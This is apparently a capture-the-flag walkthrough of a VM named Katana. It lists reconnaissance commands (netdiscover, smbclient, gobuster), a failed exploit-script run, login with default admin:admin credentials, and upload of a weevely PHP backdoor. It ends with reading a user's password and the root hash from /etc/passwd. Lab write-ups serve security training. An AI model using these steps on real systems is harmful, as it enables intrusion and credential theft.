sudo netdiscover -r 192.168.213.0/24 Currently scanning: 192.168.213.0/24 | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.213.1 00:50:56:c0:00:08 1 60 VMware, Inc. 192.168.213.2 00:50:56:ed:a6:8f 1 60 VMware, Inc. 192.168.213.129 00:0c:29:3f:3b:78 1 60 VMware, Inc. 192.168.213.254 00:50:56:e3:da:55 1 60 VMware, Inc.
nice, there was a ebook path! it was a book store cms, there was two path to get shell
login admin and add book, and upload a shell
use exploit it all fail. fot first, it seems cant write file into the img path. second,it fail too.
1 2 3 4 5 6
python3 47887.py http://192.168.213.129/ebook /home/rightevil/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.18) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version! warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported " > Attempting to upload PHP web shell... > Verifying shell upload... > Web shell failed to upload! The web server may not have write permissions.
try another port
smb
1 2 3 4 5 6 7 8 9 10 11 12 13 14
smbclient -L //192.168.213.129 Password for [WORKGROUP\rightevil]:
Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.9.5-Debian) Reconnecting with SMB1 for workgroup listing.
Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP KATANA
nothings, and we could use enum4linux to enum user.(user:kanata) 7080 it’s a rabbit hole nothing
yes, the docs was the manual guide page about OpenLiteSpeed Web Server 1.5, but i dont find the exploit about it. let’s search page
1
gobuster dir -u http://192.168.213.129:8088/ -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 50
there was a upload.html after trying, we could upload php file in it, but we it seems dont show in port 8088
but it was a web page too(cause /html), so let’s try other port 8715 it have a get login, and we could login by admin:admin and our backdoor was in this port!
let’s connect to it by weevely(i generate the backdoor by weevely).
in /home/kanata, we find kanata’s passwd, and there was root’s hash in /etc/passwd. but kanata dont have sudo or other, and we couldn’t crack the root’s hash